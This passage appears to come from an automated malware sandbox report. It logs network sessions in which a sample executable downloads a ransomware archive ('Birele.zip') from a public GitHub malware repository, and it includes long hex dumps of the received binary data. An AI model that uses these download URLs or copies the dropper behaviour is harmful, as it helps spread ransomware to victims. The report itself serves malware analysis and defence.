f9 10 53 2b 33 60 28 05 67 11 62 2b b8 dd 49 57 61 89 62 5a 2b e1 82 72 02 68 af Data Ascii: >&"sq&\|LGr&2~^{&}V^p[v,x'}yv<mk:hJJNY}UeQx:B\WbFkG{L>VbZlDbmP[./<LNZj8+@w(Q\$rm-ewUv@"yS+3`(gb+IWabZ+rh
2022-09-29 12:51:24 UTC	1841	IN	Data Raw: ab 66 5f 19 34 f9 87 2b 03 0f 80 fa c3 ee 6c 08 af b0 ad cf eb 28 3c a1 63 f5 f0 99 e3 37 bd 2d 37 4d db c3 59 6e fb ed 42 ea 6e ee 51 0f 2d 7b 89 6c db cc b2 f8 c1 e5 22 a0 dd 31 6b 36 72 ea 00 b9 99 2e 50 47 d1 a9 da 5b 4c e0 bc b9 a2 3b a8 87 e3 12 e7 63 21 32 6e fb 4b 8b e4 26 6a 9b 44 63 06 78 e9 34 b7 fd bc 3d c2 fe f3 cc bb 02 d7 93 8a ab 8f 07 0b 87 8f 67 b3 03 92 84 dd 83 b1 f1 53 81 3f d4 ea 49 04 1f 75 11 73 39 ad 70 81 87 12 ec 3a 85 24 7d e2 b9 ab 34 aa 56 de c5 1d e4 0f 27 10 63 e3 ff 83 17 f6 92 d6 08 70 c2 78 db 3e bb 10 a7 ff 12 be 51 8d ea f6 af f8 54 40 f9 31 15 f6 8e 60 0a 93 9c b7 08 0d 95 ed fe 58 9f 35 56 43 38 7a 8f 05 b1 40 7b e7 53 a8 40 71 5c 5c 52 32 3b 8e 91 d3 e8 29 07 18 71 b3 55 dd ee 58 0d 11 90 7f a6 a1 3b 27 29 0d 2f e8 Data Ascii: f_4+l(<c7-7MYnBnQ-{l"1k6r.PG[L;c!2nK&jDcx4=gS?Ius9p:$}4V'cpx>QT@1`X5VC8z@{S@q\\R2;)qUX;')/
2022-09-29 12:51:24 UTC	1857	IN	Data Raw: d1 c2 37 5a 06 af 09 20 f2 e5 32 57 63 3c 62 ae 1a 43 98 86 2c 95 07 4e a4 fa de 5b 61 30 e8 17 87 3b 4d 64 bd 35 dc 9e 56 78 9b da 5f fa 8c 21 70 97 57 62 db bf b3 db 50 e2 c1 22 e6 69 e5 82 ff 94 68 f3 c6 a7 37 35 9b 7c ed 57 6d af e0 58 0a d8 40 b4 a0 bc 13 09 ce 8e 0f 2c 42 4b a4 82 42 46 25 18 c1 a0 4a 12 09 ee b6 dc e0 4f 2b 59 82 0e ee 17 8d b1 57 c1 4c f4 f8 73 7b 1e d8 32 1d b1 d3 c5 90 90 4d 23 0e 15 d3 14 43 28 db 8b 24 09 f3 26 0f b2 9a 79 93 f7 35 82 21 3c 17 be f5 12 ae 75 cf d3 2e 62 91 2d ba 58 fd eb 3d 50 5f 32 46 ef 9b ac aa f7 17 e2 82 c8 0b a1 5c 5b 53 4f ba cd cd c3 f9 e3 0b 49 15 69 b3 b2 23 dc 08 aa fe 07 36 de 80 86 f0 39 ce 93 a0 27 fa 0b f5 d7 7a a7 4a 02 d0 d2 02 eb 86 0f 28 68 17 3c f7 95 1a 53 fd 36 ae ff 19 fe 38 e1 d9 e4 0c Data Ascii: 7Z 2Wc<bC,N[a0;Md5Vx_!pWbP"ih75\|WmX@,BKBF%JO+YWLs{2M#C($&y5!<u.b-X=P_2F\[SOIi#69'zJ(h<S68
2022-09-29 12:51:24 UTC	1873	IN	Data Raw: dd 11 eb 16 78 c5 bb dc d5 41 78 c2 47 f0 d9 ee b3 48 16 d1 92 0b dc a8 84 5f f1 72 af 10 b4 53 05 3f 63 0d 07 38 c0 d8 11 19 e7 e0 4d cc 6f 19 2b f9 ec d5 ce 2c fc f1 cf c2 d1 55 ff 8d a3 4e ba 61 e4 92 8f ea ea 2d e6 01 00 ab 9a 7e d4 0d 04 69 f9 b7 0e e1 12 27 3a 6c 80 82 b0 da 50 10 82 c5 48 8e a5 cd 06 2a 22 e0 47 b2 c4 ef c0 e0 a9 4f 63 90 8d 21 c7 27 8b 0d a6 a5 38 3a e9 be 4c e7 6f 3c 30 90 99 4a 28 ef 01 b1 de fa e3 40 09 59 25 0a 15 0d 58 b9 7b 1e 75 1a b3 6b ab 0a c4 22 c5 5b c0 8a bb 7b 0b a7 aa 19 f0 b6 90 e3 34 b8 73 2d ca 02 1a 86 70 60 90 94 9b 64 b7 fc 7e 74 8c 42 05 5b 0b 84 f1 cf e5 73 01 b2 a5 26 41 f3 ff fc 69 67 6e 06 e2 d8 6a 3a 92 92 36 2e 48 20 72 37 b6 25 7b 24 9d 08 d0 5f e9 d1 1e db ff e6 b0 9f 50 78 48 7d 91 0f cd 93 f5 7f 67 Data Ascii: xAxGH_rS?c8Mo+,UNa-~i':lPH*"GOc!'8:Lo<0J(@Y%X{uk"[{4s-p`d~tB[s&Aignj:6.H r7%{$_PxH}g
2022-09-29 12:51:24 UTC	1889	IN	Data Raw: 1f db 5f 96 30 d9 f2 88 e6 67 49 4f f5 86 ad f1 5c 89 82 91 8b 01 43 4a 82 87 cf 5e 18 68 64 9b 37 64 63 15 2c 9e ca 36 bc 13 b3 70 31 11 a7 cb a2 a3 2f c7 9a 74 f8 37 47 d2 d7 22 9f 02 d0 88 c1 9c b6 9e 1e a9 57 25 9b e9 2a 26 fe cd cb a8 64 53 e5 64 eb 25 33 9e 7b 95 a4 6e a9 a6 60 f6 a4 df 05 5f 56 a7 c0 02 4e ba 7f 4d 6f b7 a8 62 9b be 5d 72 82 21 4a f2 ce 78 6f f8 3b 4b cf 00 5d 1c dc 02 f9 be bb f6 c0 cb cc 17 5c da 1a 89 82 26 43 73 cc 09 da d3 42 aa 9d 4a 58 21 b1 4f 19 14 df a6 44 b6 d0 21 1e 4a 8a 19 23 7b de d1 cb 71 1f 82 d1 41 94 c5 2e 84 7f fd 19 6c bf 42 9b 6c d1 3d 43 2d 08 da 0b 20 7b cc 49 b9 c1 0e ca 18 18 18 cf 87 17 82 08 26 4a 81 64 13 38 07 ac 82 7e 45 72 c7 0c 8a f4 30 62 71 db 92 72 83 dc 96 e6 ee 38 5f 54 4e 60 af 4b 35 38 71 d8 Data Ascii: _0gIO\CJ^hd7dc,6p1/t7G"W%*&dSd%3{n`_VNMob]r!Jxo;K]\&CsBJX!OD!J#{qA.lBl=C- {I&Jd8~Er0bqr8_TN`K58q
2022-09-29 12:51:24 UTC	1905	IN	Data Raw: 0e 59 b1 28 1e 75 b9 cd 6f 97 5e c5 db 3b 41 6f 61 e2 6c 96 46 ca 38 e2 e3 3f 2c 67 33 d0 bb 76 98 9f 46 2a 88 e9 b6 45 63 1c 46 e8 b4 3c 93 17 1a 63 cf d1 dd a8 6e b9 f4 f2 ac d3 41 c0 54 0a 14 7a 97 40 fd de a0 d9 2d 9a ee 15 5f 3f 01 f0 55 cb 1b 8a 0e 35 ab 5e 2a 2f 61 44 ff 76 37 ab 8f 69 81 c8 f8 7b f7 87 71 cd ca a5 cd 5d b9 e1 21 5a b9 e3 c8 ed 9b 2a 7e b0 04 47 22 a6 d5 83 ce 8c 02 76 f5 7b 1e c7 70 d1 82 30 9e cc 61 25 e8 9c 92 ad 34 6a 15 67 65 e1 86 ce e9 3a 56 45 75 06 1e 8a 13 9d 12 42 51 ec 48 8c bc 4a 65 b5 9a 83 74 ba 69 ff 09 4a 04 00 ff b8 5b 2b 9a 55 36 41 94 cf 64 94 b4 60 ff 74 14 8b 5d af de 92 61 be f7 9a 7e 19 23 36 4b 95 c1 dc ce a5 4b 8d f5 58 ad 06 1c 1e 66 7a 9b 6d 88 eb a2 18 6b f9 71 8d d7 0e ab ed bf 37 ac dd c4 c3 f1 23 b1 Data Ascii: Y(uo^;AoalF8?,g3vFEcF<cnATz@-_?U5^/aDv7i{q]!Z*~G"v{p0a%4jge:VEuBQHJetiJ[+U6Ad`t]a~#6KKXfzmkq7#
2022-09-29 12:51:24 UTC	1921	IN	Data Raw: 40 ff 9f 00 de 36 5e e9 cf 54 49 73 67 97 9f 7a f4 80 4c b2 22 1d 2d bd ae 3c 76 87 d5 80 f2 1b 18 1c 20 64 ef b0 30 10 d5 67 b9 ff 4e a8 3d 90 94 81 bd 57 5d db 65 42 53 e4 5d c2 7f 8b 8b 75 79 66 e7 16 08 79 12 ba e6 f7 c6 de d6 eb ff cf 21 a5 79 3f 87 f8 57 c9 df 3f 7a 4e b2 6b 30 13 f4 bd fc 3f 30 27 b6 e0 d2 fa 4d 20 4f 3b 28 15 20 94 c8 da 6b 95 d1 b0 f9 97 f5 73 f1 66 d5 92 1d 5f 27 a5 24 ab b0 74 3b 6d 87 c7 38 4f 56 76 8f 8c b9 d0 19 b8 4d ca 60 00 bd 25 11 c1 48 7c cd e8 10 e3 f9 bb 11 f4 f1 fe c2 88 5c 7d 41 98 b6 1f 19 fc a7 db 1a 7b 4b f4 cc 68 97 fc 47 63 55 0f 3b 39 8d a4 bd e9 b1 4b 60 a8 c9 e3 b9 f1 83 2e 7a b3 60 45 39 85 6a e5 13 10 ee 65 a1 da 36 f3 a3 43 6e e6 97 07 5f fd 61 b0 a3 ed 94 40 53 1e 5e a4 d5 47 53 49 8d 21 61 55 f5 cb 9f Data Ascii: @6^TIsgzL"-<v d0gN=W]eBS]uyfy!y?W?zNk0?0'M O;( ksf_'$t;m8OVvM`%H\|\}A{KhGcU;9K`.z`E9je6Cn_a@S^GSI!aU
2022-09-29 12:51:24 UTC	1937	IN	Data Raw: 3d e6 be 52 20 84 94 91 bf cc e1 2d 31 a6 65 8b 76 7f db 8a 5a 53 7a 13 6f 08 4d 6e 60 6b a9 e4 bd fd a9 3d 96 21 61 3d 15 b3 fd 19 f7 17 97 6f 2d 57 c1 78 d9 d3 9c 48 89 1a bf ae 4e 99 e9 f4 40 ea 98 c9 20 ea 6e bf 4c 4f 8a 1f 04 1a fb 4d a0 86 b7 49 93 ee c6 a1 29 c5 d2 94 8d ac c4 0d 2e 93 52 97 ac 9a 0d f4 a9 f5 ef ac 14 fc 97 e7 fc ae 34 00 04 92 c8 4e ab ff 87 79 c2 5d 6a 84 a4 62 9e 6a 81 99 50 7d 20 e2 5a 2f a7 72 f9 2d aa ad d7 36 30 d6 ff 37 06 d1 cb 3d 1c dd 35 c6 61 7a aa b3 7c b6 09 88 39 58 06 0b 19 b5 00 67 6b 7d a3 c6 3c 97 d3 57 4e 67 39 92 75 38 d8 1e 68 73 71 e6 24 3f 74 52 8a a3 a8 4e 00 8f ef b8 89 a7 74 4b 2b 64 03 92 ce 1e 4a a5 74 a5 a2 08 a0 f9 6a 01 42 14 a0 e8 c0 f5 91 23 b5 25 63 61 88 13 c5 2f eb a9 5c de 92 b8 c1 96 5f 30 a2 Data Ascii: =R -1evZSzoMn`k=!a=o-WxHN@ nLOMI).R4Ny]jbjP} Z/r-607=5az\|9Xgk}<WNg9u8hsq$?tRNtK+dJtjB#%ca/\_0
2022-09-29 12:51:24 UTC	1953	IN	Data Raw: d5 e1 53 80 61 a2 80 f0 62 b6 6f 1f fe 25 33 e8 1e b3 5a 3c e5 f2 b3 d0 5f 3e 95 dc 41 86 34 aa d8 4f bd 59 ce ff b2 db ed c1 fe b3 35 31 ca 79 4c b2 38 5f 96 b6 5c bb f1 99 1f 79 51 21 bf f6 83 1b ef cf 78 22 f1 58 42 52 c2 fd 9f 62 16 af 64 3a d6 21 85 d3 fc 9e f8 a9 88 ad b6 79 ce 4f 25 c2 55 f7 8d 56 34 c0 e4 fc 25 f3 8c f0 d2 8d c0 21 28 fe 32 60 da 93 6d a3 38 73 72 81 b4 8a f9 9b 6f 21 91 d8 98 a5 bb f5 f9 d0 40 b1 2f 7c 3d 68 83 9e 40 e4 aa 96 54 9e 56 fa 8b b3 dd f4 97 bb 21 84 ce 44 70 2d 98 6b 85 5f 2d 44 ca 65 59 cf c0 ed ea 28 27 60 06 ae e1 d0 26 33 83 c0 53 20 9e ef 3d 84 99 29 bc 91 ce 23 71 54 6d 27 4f b0 af dc c9 5d a3 20 41 ca 4c c1 62 bc 4b ba 83 65 be 05 13 cd 60 bf 0a 4b 3b 0f 80 a6 3e 23 ae 6e c1 7c 13 83 c5 09 6e f2 08 d9 af 74 6c Data Ascii: Sabo%3Z<_>A4OY51yL8_\yQ!x"XBRbd:!yO%UV4%!(2`m8sro!@/\|=h@TV!Dp-k_-DeY('`&3S =)#qTm'O] ALbKe`K;>#n\|ntl
2022-09-29 12:51:24 UTC	1969	IN	Data Raw: 58 eb b5 78 26 9a 3c 7d fa 7c e5 9b ef d2 8d f2 72 af 96 89 48 9b ac 84 8b b9 82 ad c2 47 61 62 b8 48 77 4b 84 0d f8 85 88 4c 5a bc 6a 5d 7d 07 e3 8a 9f e3 3d 41 6c 6f eb dd a9 5a 9f 48 20 b3 31 5d 38 60 d0 a8 37 f7 85 f7 06 e8 58 a7 71 a9 14 56 8f 02 ed d3 f0 a7 4c dd 3e 0c a3 f7 5c f3 3c ef f8 fa 01 2f 03 72 ad 61 2f 46 d5 84 f4 e4 78 67 11 0c c0 5f 98 aa 11 f0 e3 0e af 81 4f 29 c9 15 11 e4 c1 6a c2 2d 70 c6 6d 18 82 8c cc be 77 8f 94 85 94 c1 21 70 c3 36 69 c9 28 4c a7 ef 87 10 51 f3 7c 1e 3f 30 6f 7f 8c da 4a 9e f8 26 03 08 f5 c6 92 6b 64 90 37 5a ee 83 6b be 98 9d 05 00 98 ac fd 83 d9 62 db 00 7d c8 9a b7 93 b4 cf e2 63 0a cb 8d 9e cc ac 1a b9 3b 42 37 cd 4a 66 9b 42 69 4a d5 24 cc c5 73 c2 d4 71 d5 3b 23 4e 34 06 c2 8e dd 42 d9 54 c6 d5 2a f3 57 a3 Data Ascii: Xx&<}\|rHGabHwKLZj]}=AloZH 1]8`7XqVL>\</ra/Fxg_O)j-pmw!p6i(LQ\|?0oJ&kd7Zkb}c;B7JfBiJ$sq;#N4BT*W
2022-09-29 12:51:24 UTC	1985	IN	Data Raw: c1 9c 18 94 36 d1 22 a6 3e 49 65 c5 37 cf ee f6 29 df d3 3f de ab 36 13 27 76 5e ea 25 80 f8 67 8f 87 bc 21 7f 0b 69 76 72 da 47 81 51 83 03 75 c3 5a bd 41 76 36 e9 4a 16 7d 10 41 c4 25 5d dc 6a 4c d3 f4 cb 5b f7 8e 89 af a3 66 55 79 67 bd 3d 3d 17 3d ab ba fb 4f 02 cb 50 20 64 bd d7 40 c5 3e 90 a5 f8 44 f1 f2 6f b5 be 29 00 9f fa 19 03 b4 98 9b 17 1b d0 b0 87 5a f3 ac 9c 27 c2 b3 be bc 88 45 d9 8f 5c fe bc ba 65 45 69 7a 9d b6 17 d7 8c 52 98 b8 31 9d c9 4b 91 0b a8 9f 25 c0 12 e4 8c da 37 77 05 0c 0c ce 69 17 9f ac a8 79 a5 32 17 f4 ea f0 43 78 7a 39 97 7a df f3 13 b2 2a dc 43 30 e0 46 27 cc 8d 6e b5 51 2c 41 b5 06 eb 74 a3 f4 17 43 06 24 19 5d 3e a4 78 3b 54 c4 f0 13 c4 ed e9 3d 66 2a 7a a7 c4 6f 3e 26 85 4b f6 35 9f 3f 76 4a 8a 84 9e 49 cd 4f 96 40 21 Data Ascii: 6">Ie7)?6'v^%g!ivrGQuZAv6J}A%]jL[fUyg===OP d@>Do)Z'E\eEizR1K%7wiy2Cxz9zC0F'nQ,AtC$]>x;T=fzo>&K5?vJIO@!
2022-09-29 12:51:24 UTC	2001	IN	Data Raw: c3 21 d7 a3 a4 eb 7d 5c 6c a2 73 5a e3 56 61 c0 7d f9 ec b5 47 e1 2f 4e a5 19 b8 c7 d7 b7 71 4e f4 5f 16 f2 fe 37 f5 48 e5 db c2 0b 1e 8d 2c 48 c7 86 d5 31 28 e1 06 14 0d 8e 03 f2 c1 dd 7d 98 da ab 72 83 6f c7 f7 fc a2 80 cb 10 a4 05 55 1b 2e e3 37 43 fe 3c 71 77 45 b7 b2 d2 00 6c 3d dc 70 c0 7e de f3 35 94 53 35 4a f4 3c 06 56 00 ec 63 98 4f f1 19 6d af 6a fc 4a c2 e6 da 17 57 61 59 dd ff ef 3a 84 dd fb 0a 8d e6 38 ff 50 aa 35 83 d3 ae d7 f1 fa ac 76 8f 7a ea dc 24 c1 60 b2 c8 f4 74 f5 0f f7 20 d0 3c 4f 15 dd 39 38 89 19 d8 72 ff f2 ae 22 e6 d7 a9 f7 7c a5 8e b7 a6 42 f8 fc 3c 9a d2 32 10 da 03 c6 fe e6 b4 79 d1 82 e8 c1 f4 b2 a7 d5 09 18 1e ec d8 12 30 9e a0 5c ae f2 cb c2 da 9d 33 02 70 1a e2 ab 06 93 3f 0d 0b fc 10 4f eb 1f ce a4 97 cb ad e0 d7 c5 e3 Data Ascii: !}\lsZVa}G/NqN_7H,H1(}roU.7C<qwEl=p~5S5J<VcOmjJWaY:8P5vz$`t <O98r"\|B<2y0\3p?O
2022-09-29 12:51:24 UTC	2017	IN	Data Raw: 8f 46 0e ac ff fd 63 09 bc 52 89 4d fc 4b 79 fa 84 ee d9 3f bc 00 1d bb c9 f6 a2 c4 53 66 59 67 22 23 31 86 94 0a cf 5b 4f 1f 50 1f d6 cf 91 13 0f 9a e6 cf 4c 0b 68 3f c6 83 75 55 bd ae 5a 74 9e 8f 03 3a 2f bd f2 e7 b7 7d 81 fa 1c 25 16 e4 f3 38 4b 65 2e d2 f8 90 5c 10 2c e4 27 b7 ae 93 d3 21 ae be ef c6 d2 8b 94 7a 01 c7 50 98 43 ef 0c c0 81 69 57 0e ff 45 09 28 7d c2 8a 04 7a 58 5b 19 04 d0 15 4c 86 7c 8f b9 bd 53 a5 ed 70 13 65 9c 87 40 03 8f 16 9f 18 7c 1d 43 16 ed f9 53 ce 9d 7e 31 a7 ae bc 07 2d e6 3a e0 94 30 a1 47 f8 dd fd a7 8c dc 74 c4 47 8c d2 1e fd 41 24 91 03 7f 92 98 0d 47 1e 89 ca 7b 14 0a c6 64 52 05 55 0d 13 d7 68 25 23 2c 29 e9 2e 26 77 94 8b 06 83 52 22 16 a9 8b bf 34 a7 4f d6 e0 eb fc 94 65 cf 3e c1 19 7b 68 b3 39 b5 84 ea 74 29 4b 81 Data Ascii: FcRMKy?SfYg"#1[OPLh?uUZt:/}%8Ke.\,'!zPCiWE(}zX[L\|Spe@\|CS~1-:0GtGA$G{dRUh%#,).&wR"4Oe>{h9t)K
2022-09-29 12:51:24 UTC	2033	IN	Data Raw: 43 a5 9d 15 f3 2e ed f5 51 96 f5 73 7b c4 00 44 56 8a 93 e2 fb a6 4f 10 8b 14 e2 e8 54 79 d5 a8 b7 a4 96 f5 0a 04 44 f2 81 6a af 13 8b 9b 08 eb 45 62 3e 2f 6f 34 8f e0 e1 f7 e7 c8 f0 4f cc 19 39 16 c0 ff 19 37 e8 3a 17 cf 8f af d3 e7 02 4b 98 3b 81 ce 34 de 6e e3 4d f4 af 46 4c a2 a7 3b 5b 4a 79 17 51 53 5c 34 3f 15 7f 39 b1 b8 1b e5 63 a3 aa 94 6d 94 a4 fc b9 9d ce 3a 42 a2 9b 24 f8 ec 49 5e e1 1a 87 81 4f d1 62 b2 b8 d3 b2 4e 1f e5 c1 a0 fe 97 8b 38 dc 5a 8f fb c4 8a dd 98 bc d0 89 1c 1c da cd cf 1b d5 33 cd 00 63 b4 61 24 ae 84 47 af 95 86 10 06 19 c8 ef d5 3c df 9b 96 c0 fe 55 59 b1 f1 f2 04 d5 b1 2a 82 80 cf 75 43 d7 6a b3 de 06 46 72 0f 9b 5f 00 66 2b 3c 87 3c fd 63 55 50 37 1d 27 20 4b b9 57 8c cd 1b e2 5e 9a 08 d7 b8 d7 9c 65 49 61 d1 04 62 b7 5d Data Ascii: C.Qs{DVOTyDjEb>/o4O97:K;4nMFL;[JyQS\4?9cm:B$I^ObN8Z3ca$G<UY*uCjFr_f+<<cUP7' KW^eIab]
2022-09-29 12:51:24 UTC	2049	IN	Data Raw: 7f 17 28 44 8d 85 c6 15 cd dc 4e 87 4e 1a 27 d4 6b 30 ac b3 eb aa 2b d1 4c 78 d1 a9 8a f3 6a ca e8 86 07 c5 c0 1a 7a 64 cd cc ac b2 7c 82 d7 83 24 53 ab 27 69 60 dd 37 df 5a db 2f 6c 35 95 67 26 c3 2f 1c 33 63 5e 31 a5 58 86 b9 88 6b db 89 53 fd ee fe 7b 7b 28 2f 22 47 b6 72 24 ea 19 2b 85 82 ab 51 77 f2 1f 4b 01 b9 75 57 de 21 aa 73 92 ff d1 14 66 6d 97 8c 33 49 a3 86 85 67 06 1c 18 a3 65 57 ab a6 51 67 66 bb 26 55 4d a5 90 9a 89 11 66 bd 61 bc 4a eb 39 99 bf dd 3a f2 7b 35 b9 20 99 dc 68 54 a5 7c 0f df 4d be b4 07 03 8c 5e 94 5d 03 6c 5f e8 85 e1 a2 9b 27 36 77 55 4e d4 18 62 bc 23 db 63 5d 46 2b 15 92 ac 83 72 c4 4b b3 e4 ba a6 f5 68 8c 91 71 35 d8 8f a3 f3 87 14 d7 2f 3d 97 c0 8a 68 4a 75 50 73 d7 64 3f e8 7a 23 1a c2 13 af da 2e b0 16 d4 91 b1 53 9d Data Ascii: (DNN'k0+Lxjzd\|$S'i`7Z/l5g&/3c^1XkS{{(/"Gr$+QwKuW!sfm3IgeWQgf&UMfaJ9:{5 hT\|M^]l_'6wUNb#c]F+rKhq5/=hJuPsd?z#.S
2022-09-29 12:51:24 UTC	2065	IN	Data Raw: d1 cf f8 66 06 bb 43 98 f0 ea e4 06 f1 3a e9 d2 28 f1 e9 e1 9a c0 df bd 3d 79 cd b0 90 b0 53 69 33 cb 76 a9 b0 42 78 d1 8e c1 69 a4 7a 6e 2a 16 ac 87 dc 0a 4e 55 44 95 2d ac 63 f8 79 c5 a0 3b b4 74 cf b0 b9 ac cd 36 1d 58 a8 bf 8d 05 73 37 36 be bf 63 b4 e4 ee 4c b8 55 92 fc 35 cf 67 83 59 0e a2 8b 0e a6 6f e7 b8 88 71 0c a3 f4 db 8c 3a 84 d2 a7 d6 f2 35 fb cb 9e f8 8c 44 4b a0 ac c8 ac 14 97 53 1f ab c1 8e 01 0c af 10 77 54 b9 7e e2 05 84 8e 4c ed 5f 0f 75 bf 65 8f f2 65 98 c3 29 df 06 fc f6 89 e9 a5 9d cd d1 da 78 59 68 be 0f 3f 39 ea 22 e9 9a b2 ad 9f ca 91 c5 98 f3 b0 12 43 22 3e e8 ac 0a ba ca 08 4b cc f4 f0 d6 a5 a7 14 62 14 f3 22 41 e3 18 54 0a 0d 67 fd 36 61 72 04 31 a6 57 e4 8c 86 32 74 2b 35 ca 55 46 3b 4e 50 3c e0 2b cf 58 d0 0a 14 c4 72 9d f3 Data Ascii: fC:(=ySi3vBxizn*NUD-cy;t6Xs76cLU5gYoq:5DKSwT~L_uee)xYh?9"C">Kb"ATg6ar1W2t+5UF;NP<+Xr
2022-09-29 12:51:24 UTC	2075	IN	Data Raw: 63 56 c2 e0 47 27 1f ec 8f 02 5c 11 2c d1 98 6c 85 93 7d d3 ba 94 f9 7f ee 87 47 b7 28 56 f8 6f fb 42 aa 3b 2a 5a 03 e3 69 b7 e0 e7 0c 00 78 13 be a9 a4 d4 9b 0b 2d d5 37 97 02 22 92 80 40 6b be 54 59 de ed 49 80 5c 29 d1 24 6c ee af 4d c3 a9 1c 4a 2d cb f3 fd 65 64 bd 1e c0 64 db 60 62 0b a2 9b 70 57 49 57 dc aa 57 74 d6 53 57 35 ef 0b dd 4b fc 4e 3a d7 99 c1 cb 30 d6 1c 19 5c ab e1 82 9c 81 5c d8 4f 22 58 1b 97 84 b7 af 57 3b 91 75 51 7c ca 23 0f 99 5a 0b 55 0c 35 77 f5 47 69 25 c5 fb de 63 1e 2b 27 a3 00 1d 78 48 b0 65 33 62 60 8f 9b f3 9b ce 6f ad 0c 7c 0b 31 f2 14 7f fb 49 1a 67 97 50 44 6f c7 e8 7a 01 a3 9e 27 52 f3 5d 53 40 dd f8 c2 bc 29 3e c4 09 e5 7e 5c 92 7d af 44 fd 25 b9 ab 01 8c 84 d1 30 36 f5 d9 37 ba 07 02 89 c6 f3 75 a0 1e f0 f9 32 12 35 Data Ascii: cVG'\,l}G(VoB;*Zix-7"@kTYI\)$lMJ-edd`bpWIWWtSW5KN:0\\O"XW;uQ\|#ZU5wGi%c+'xHe3b`o\|1IgPDoz'R]S@)>~\}D%067u25
2022-09-29 12:51:24 UTC	2091	IN	Data Raw: 97 5a 34 60 65 be ce f3 9c 07 b5 0b aa 60 28 1b dd 1d 3d c9 1d 05 9c 8a 2c cb e8 a7 1a 45 68 08 01 b1 32 ce 60 fc be 23 4c 52 77 a4 3f 15 20 11 ee b4 c5 96 f6 10 e9 4a 85 fe 01 58 ac 1c c9 24 3d 8e 20 03 bc 2b 41 ee c2 8d 47 d7 1f af b5 6b 87 9a d5 9d 3a 6a 96 6b 36 d6 a6 10 a8 5d 11 2b 12 16 1b 8e 15 17 79 ea 3e 3a 08 4f c6 fd eb a7 0f 05 2f 2a 44 70 f3 b8 10 38 e2 72 67 de d7 49 4c 1f 2d f8 c9 15 56 3e bf 82 0d db b7 18 5a 1c 41 78 53 17 a0 0e 32 b8 16 05 01 9a 74 27 de 78 95 19 e7 51 40 25 e5 ee 63 b8 d9 d1 c0 cf 7f 54 e5 fc fa a4 4a ad 00 67 82 bd 87 17 42 4d 9f 1f c6 98 78 e5 56 0f d9 f0 cb a7 b1 6b 81 f4 84 28 57 2f bc 3c ef aa 20 96 b0 c5 0d c4 05 45 c4 5f 53 34 91 af f3 ff fb 2e 7a a3 34 ab 29 99 84 ac be ed 7f 95 94 4a 8c 61 f0 c5 c8 5d db 14 36 Data Ascii: Z4`e`(=,Eh2`#LRw? JX$= +AGk:jk6]+y>:O/*Dp8rgIL-V>ZAxS2t'xQ@%cTJgBMxVk(W/< E_S4.z4)Ja]6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49720	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:49:54 UTC	396	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1 Host: github.com
2022-09-29 12:49:55 UTC	396	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:49:55 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:49:55 UTC	397	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49721	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:49:55 UTC	399	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:49:55 UTC	399	IN	HTTP/1.1 200 OK Connection: close Content-Length: 116134 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:49:55 GMT Via: 1.1 varnish X-Served-By: cache-mxp6961-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455795.214913,VS0,VE311 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: f7e9ab5b67d35b6de15e89d8fc6135460c77a4e8 Expires: Thu, 29 Sep 2022 12:54:55 GMT Source-Age: 0
